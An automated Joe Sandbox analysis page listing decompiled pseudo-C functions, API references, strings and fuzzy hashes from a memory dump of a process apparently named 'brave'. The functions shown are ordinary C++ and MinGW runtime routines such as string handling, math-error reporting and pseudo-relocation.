Instruction ID: a8baced4b3ab2b208dc499cea659e217c8b6e5e971e22cbaddf98d0d62e5e97e
Opcode Fuzzy Hash: 053ff8a127323fabc25172c75465cfa7311902f130f2a5a7fc06635915c12a55
Instruction Fuzzy Hash: 0F3128A3608E8684DA38EB15C448679B354FB46FE0FC84532DE6D473A1DFACD244C318

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB8580 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00007FF77FF715BB8580(long long* __rcx, void* __rdx, void* __r8, void* __r9) {
				void* _v73;
				void* _t16;
				intOrPtr _t23;
				intOrPtr _t24;
				long long* _t25;
				long long _t37;
				intOrPtr _t38;
				long long _t45;

				_t23 =  *((intOrPtr*)(__rcx));
				_t38 =  *((intOrPtr*)(_t23 - 0x18));
				_t25 = __rcx;
				_t37 = __r9 - __r8 + _t38;
				if (_t37 -  *((intOrPtr*)(_t23 - 0x10)) > 0) goto 0x15bb85cb;
				if ( *((intOrPtr*)(_t23 - 8)) <= 0) goto 0x15bb8660;
				_t24 =  *((intOrPtr*)(__rcx));
				E00007FF77FF715BB70D0(_t16, _t37,  *((intOrPtr*)(_t24 - 0x10)));
				if (__rdx == 0) goto 0x15bb8600;
				_t8 = _t24 + 0x18; // 0x18
				_t45 = _t8;
				if (__rdx == 1) goto 0x15bb86a0;
				memcpy(??, ??, ??);
				if (_t38 - __r8 + __rdx != 0) goto 0x15bb8640;
				asm("lock xadd [ecx-0x8], eax");
				if (0xffffffff <= 0) goto 0x15bb8690;
				 *_t25 = _t45;
				 *((intOrPtr*)(_t45 - 8)) = 0;
				 *((long long*)(_t45 - 0x18)) = _t37;
				 *((char*)(_t45 + _t37)) = 0;
				return 0xffffffff;
			}

0x7ff715bb8590
0x7ff715bb8593
0x7ff715bb85a8
0x7ff715bb85ae
0x7ff715bb85b7
0x7ff715bb85be
0x7ff715bb85c4
0x7ff715bb85d3
0x7ff715bb85e2
0x7ff715bb85e7
0x7ff715bb85e7
0x7ff715bb85ef
0x7ff715bb85fb
0x7ff715bb8603
0x7ff715bb860d
0x7ff715bb8614
0x7ff715bb8616
0x7ff715bb8619
0x7ff715bb8622
0x7ff715bb8627
0x7ff715bb863c

APIs

memcpy.MSVCRT ref: 00007FF715BB85FB
memcpy.MSVCRT ref: 00007FF715BB8681

Strings

basic_string::_M_create, xrefs: 00007FF715BB8586

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_create
API String ID: 3510742995-3122258987
Opcode ID: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
Instruction ID: 82fd6693be0340530524fcf944f8ca9387f74156060aea4d2731e0cd8e8dbad3
Opcode Fuzzy Hash: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
Instruction Fuzzy Hash: 91310722B09D828CD639BE29D44867DA7606B15FE4FDD4032EE0D473A2DFACD649C364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB7770 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF77FF715BB7770(long long* __rcx, void* __rdx, void* __r8) {
				intOrPtr _t15;
				void* _t18;

				_t15 =  *((intOrPtr*)(__rcx));
				_t18 = __r8;
				if (__r8 - 0xfffffff9 > 0) goto 0x15bb7885;
				if (_t15 - __rdx > 0) goto 0x15bb77c0;
				if (_t15 +  *((intOrPtr*)(_t15 - 0x18)) - __rdx < 0) goto 0x15bb77c0;
				if ( *((intOrPtr*)(_t15 - 8)) <= 0) goto 0x15bb77f8;
				E00007FF77FF715BB8580(__rcx, _t15 +  *((intOrPtr*)(_t15 - 0x18)),  *((intOrPtr*)( *((intOrPtr*)(__rcx)) - 0x18)), __r8);
				if (_t18 == 0) goto 0x15bb77e7;
				if (_t18 == 1) goto 0x15bb7840;
				return memcpy(??, ??, ??);
			}

0x7ff715bb7779
0x7ff715bb777f
0x7ff715bb7796
0x7ff715bb779f
0x7ff715bb77a8
0x7ff715bb77af
0x7ff715bb77c8
0x7ff715bb77d0
0x7ff715bb77da
0x7ff715bb77f3

APIs

memcpy.MSVCRT ref: 00007FF715BB77E2
memcpy.MSVCRT ref: 00007FF715BB781C

Strings

basic_string::assign, xrefs: 00007FF715BB7885

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy
String ID: basic_string::assign
API String ID: 3510742995-2385367300
Opcode ID: fb17081675a219e1f0fc3f775fff8980a65a6587ebdc272469192e30fdad70a3
Instruction ID: 51f3a0cc35923452520b6a87624909e24ac480c07d71e66aa81c2f4801361793
Opcode Fuzzy Hash: fb17081675a219e1f0fc3f775fff8980a65a6587ebdc272469192e30fdad70a3
Instruction Fuzzy Hash: 8531F826F05E8140EE39AA17980417DA750EB49FE4FCC4432DE1D473A1DFACE648C364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB17C0 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF715BB181A
MultiByteToWideChar.KERNEL32 ref: 00007FF715BB185A

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 50a1678145b16bab232309967df9fd668cd50a23a04a899717ea535bdf31dc07
Instruction ID: 6b03ad89537c0431d0ab45d84a0beb21ddf2e63c2b111ea98c4aa228e9725dfb
Opcode Fuzzy Hash: 50a1678145b16bab232309967df9fd668cd50a23a04a899717ea535bdf31dc07
Instruction Fuzzy Hash: 0731E772E0CA8186E3745F24B80037DB6A0BB81BA4F944130EAD8877E4DF7DD689CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA3E60 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF715BA3E7D
GetProcessAffinityMask.KERNEL32 ref: 00007FF715BA3E8C
GetCurrentProcess.KERNEL32 ref: 00007FF715BA3ED2
SetProcessAffinityMask.KERNEL32 ref: 00007FF715BA3EDA

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 04ae4b65f7585559c3679ad51c5bc39c8c573643832490c12df30e719fc6ef8c
Instruction ID: cc1a62ee0e7c3188b1c58faa3bcfaa46c0ac6c0eb6e0e563936f9c181a4c7ac3
Opcode Fuzzy Hash: 04ae4b65f7585559c3679ad51c5bc39c8c573643832490c12df30e719fc6ef8c
Instruction Fuzzy Hash: 8201B125A09A0641EA7A6B25794036BD690BB04FACF842035DE4D473A1EFBDD94DC220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9E830 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715B9E830(void* __eax) {
				intOrPtr _t4;

				_t4 =  *0x15e510f0; // 0x1
				if (_t4 == 0) goto 0x15b9e860;
				return __eax;
			}

0x7ff715b9e845
0x7ff715b9e84d
0x7ff715b9e85f

APIs

VirtualProtect.KERNEL32(00007FF715E51098,00007FFC2FC93CA0,?,?,?,00000001,00007FF715B91261), ref: 00007FF715B9E9D5

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF715B9EAA1
Unknown pseudo relocation bit size %d., xrefs: 00007FF715B9EA95

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 5fb716cdb40ff7fdc5252b81bfc427b99c136fbcf60d099ab7d8640e641fe08e
Instruction ID: 5fae33999385c3ae4e84c070000ec1f1a60c73b56733ced5010fee961eedbeaa
Opcode Fuzzy Hash: 5fb716cdb40ff7fdc5252b81bfc427b99c136fbcf60d099ab7d8640e641fe08e
Instruction Fuzzy Hash: 6961C8B6F08E428AEA38AF21944017AF761BB55FB4F948535DA5D073B4DF3CE449C620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA1110 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00007FF77FF715BA1110(void* __rcx) {
				void* _t29;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				void* _t68;
				void* _t76;
				intOrPtr* _t80;
				intOrPtr* _t81;
				intOrPtr* _t82;
				void* _t89;

				if (__rcx == 0) goto 0x15ba1310;
				_t80 =  *0x15e46920; // 0x7ff715e51400
				_t52 =  *_t80;
				if (_t52 == 0) goto 0x15ba11f8;
				if ( *((long long*)(_t52 + 0x90)) != 0) goto 0x15ba1220;
				 *((long long*)(_t52 + 0x90)) = 0x15e42bc0;
				E00007FF77FF715BA8830(0x15e42bc0, _t76);
				_t53 =  *_t80;
				if (_t53 == 0) goto 0x15ba1238;
				if ( *((long long*)(_t53 + 0x88)) == 0) goto 0x15ba1260;
				_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x88))));
				if (__rcx == _t55) goto 0x15ba1348;
				if (_t55 == 0) goto 0x15ba1348;
				_t56 =  *((intOrPtr*)(_t55 + 0x18));
				if (_t56 == 0) goto 0x15ba1320;
				if (__rcx != _t56) goto 0x15ba1190;
				_t39 = _t56;
				if (_t39 == 0) goto 0x15ba1320;
				 *((intOrPtr*)(__rcx + 0x10)) =  *((intOrPtr*)(__rcx + 0x10)) - 1;
				if (_t39 == 0) goto 0x15ba12b8;
				_t57 =  *_t80;
				if (_t57 == 0) goto 0x15ba1280;
				if ( *((long long*)(_t57 + 0x90)) == 0) goto 0x15ba1299;
				if (_t57 == 0) goto 0x15ba134f;
				_pop(_t81);
				goto E00007FF77FF715BA8870;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t57 + 0x90)) == 0) goto 0x15ba1145;
				if ( *_t81 != 0) goto 0x15ba1220;
				E00007FF77FF715BA7060();
				E00007FF77FF715BA8830( *((intOrPtr*)( *_t81 + 0x90)), _t76);
				_t59 =  *_t81;
				if (_t59 != 0) goto 0x15ba1164;
				E00007FF77FF715BA7060();
				_t60 =  *_t81;
				if ( *((long long*)(_t59 + 0x88)) == 0) goto 0x15ba1260;
				if (_t60 != 0) goto 0x15ba1172;
				E00007FF77FF715BA7060();
				goto 0x15ba1172;
				 *((long long*)(_t60 + 0x88)) = 0x15e51388;
				goto 0x15ba1179;
				asm("o16 nop [cs:eax+eax]");
				E00007FF77FF715BA7060();
				if ( *0x7FF715E51418 != 0) goto 0x15ba11d4;
				 *((long long*)( *_t81 + 0x90)) = 0x15e42bc0;
				_pop(_t68);
				_pop(_t82);
				_pop(_t89);
				goto E00007FF77FF715BA8870;
				_t16 = _t89 + 8; // 0x8
				_t29 = E00007FF77FF715BA09D0(_t16);
				if (_t68 == 0) goto 0x15ba12dd;
				 *((long long*)(_t68 + 0x18)) =  *((intOrPtr*)(_t89 + 0x18));
				free(??);
				goto 0x15ba11ba;
				_t64 =  *_t82;
				if (_t64 == 0) goto 0x15ba1359;
				if ( *((long long*)(_t64 + 0x88)) != 0) goto 0x15ba1378;
				 *((long long*)(_t64 + 0x88)) = 0x15e51388;
				 *0x15e51388 =  *((intOrPtr*)(_t89 + 0x18));
				goto 0x15ba12d0;
				return _t29;
			}

0x7ff715ba111e
0x7ff715ba1124
0x7ff715ba112b
0x7ff715ba1131
0x7ff715ba113f
0x7ff715ba114c
0x7ff715ba1153
0x7ff715ba1158
0x7ff715ba115e
0x7ff715ba116c
0x7ff715ba1179
0x7ff715ba117f
0x7ff715ba1188
0x7ff715ba1193
0x7ff715ba119a
0x7ff715ba11a3
0x7ff715ba11a5
0x7ff715ba11a8
0x7ff715ba11ae
0x7ff715ba11b4
0x7ff715ba11ba
0x7ff715ba11c0
0x7ff715ba11ce
0x7ff715ba11d7
0x7ff715ba11e9
0x7ff715ba11ec
0x7ff715ba11f8
0x7ff715ba1208
0x7ff715ba1211
0x7ff715ba1213
0x7ff715ba1227
0x7ff715ba122c
0x7ff715ba1232
0x7ff715ba1238
0x7ff715ba1245
0x7ff715ba1248
0x7ff715ba124d
0x7ff715ba1253
0x7ff715ba1258
0x7ff715ba1267
0x7ff715ba1271
0x7ff715ba1276
0x7ff715ba1280
0x7ff715ba1293
0x7ff715ba12a0
0x7ff715ba12ab
0x7ff715ba12ac
0x7ff715ba12ad
0x7ff715ba12af
0x7ff715ba12b8
0x7ff715ba12bd
0x7ff715ba12c5
0x7ff715ba12cc
0x7ff715ba12d3
0x7ff715ba12d8
0x7ff715ba12dd
0x7ff715ba12e3
0x7ff715ba12ed
0x7ff715ba12fa
0x7ff715ba1309
0x7ff715ba130c
0x7ff715ba1318

Strings

%p not found?!?!, xrefs: 00007FF715BA132E

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: %p not found?!?!
API String ID: 0-11085004
Opcode ID: c84520f36f3ca7fb9c18e6c0d81bf9ad638b054d908724b1f8b1681b916a0679
Instruction ID: 23987305e995b3c8bd0948c25a86b4114b20d9afb246341f8e03aad7a6112af8
Opcode Fuzzy Hash: c84520f36f3ca7fb9c18e6c0d81bf9ad638b054d908724b1f8b1681b916a0679
Instruction Fuzzy Hash: D551EA25E0AF0680FABEBB5590513B996D4AF44FE0F988475CA5D467A1EF7CA48C8330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9E530 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00007FF77FF715B9E530() {
				intOrPtr* _t8;

				asm("movaps [esp+0x40], xmm6");
				asm("movaps [esp+0x50], xmm7");
				asm("inc esp");
				if ( *_t8 - 6 > 0) goto 0x15b9e61c;
				goto __rax;
			}

0x7ff715b9e536
0x7ff715b9e53b
0x7ff715b9e540
0x7ff715b9e549
0x7ff715b9e55f

APIs

fprintf.MSVCRT ref: 00007FF715B9E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF715B9E597
Unknown error, xrefs: 00007FF715B9E61C

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: aa6086361013ec1200885a2daadc703ccdb69238cbbd2ebd5042acb3d7d1f28a
Instruction ID: e20358b3e04e02eae7dfdb537079797afd57ac33b9f3827445817d7025236d40
Opcode Fuzzy Hash: aa6086361013ec1200885a2daadc703ccdb69238cbbd2ebd5042acb3d7d1f28a
Instruction Fuzzy Hash: 2801E962C08E84C5D2169F1CD4011EAB374FF59B6AF545321EA8C1A670DF29D547C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9E5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715B9E5E0() {

				goto 0x15b9e56f;
				goto 0x15b9e56f;
				0;
				return 0;
			}

0x7ff715b9e617
0x7ff715b9e623
0x7ff715b9e62e
0x7ff715b9e632

APIs

fprintf.MSVCRT ref: 00007FF715B9E5B0

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF715B9E5E0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF715B9E597

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: f843c02a3ac8a37aa77967842025417caac5300183c0b72a0349012f07414de9
Instruction ID: 952830f11fe56096af6125bf1086e71637bd98e46e2c55e3e56f889ae33b762d
Opcode Fuzzy Hash: f843c02a3ac8a37aa77967842025417caac5300183c0b72a0349012f07414de9
Instruction Fuzzy Hash: 07F06262C08E8482D2169F2CE4000EBB374FF4EB99F685326EF8D2A574DF28D6468710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9E5F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715B9E5F0() {

				goto 0x15b9e56f;
				goto 0x15b9e56f;
				0;
				return 0;
			}

0x7ff715b9e617
0x7ff715b9e623
0x7ff715b9e62e
0x7ff715b9e632

APIs

fprintf.MSVCRT ref: 00007FF715B9E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF715B9E597
Overflow range error (OVERFLOW), xrefs: 00007FF715B9E5F0

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 3e9574b252411c4c4ea22a5fc3152e866e1922d8c7747fb6b8066ac752191a04
Instruction ID: 8847a7fa9fc078ab5cf035b7fcd5273bdae6c1182f0843ebed123ebb714d4530
Opcode Fuzzy Hash: 3e9574b252411c4c4ea22a5fc3152e866e1922d8c7747fb6b8066ac752191a04
Instruction Fuzzy Hash: 2DF06862C08E4481D2159F1CE4000EBB375FF4EB99F645326EE8D2A574DF18D5468710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9E600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715B9E600() {

				goto 0x15b9e56f;
				goto 0x15b9e56f;
				0;
				return 0;
			}

0x7ff715b9e617
0x7ff715b9e623
0x7ff715b9e62e
0x7ff715b9e632

APIs

fprintf.MSVCRT ref: 00007FF715B9E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF715B9E597
The result is too small to be represented (UNDERFLOW), xrefs: 00007FF715B9E600

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
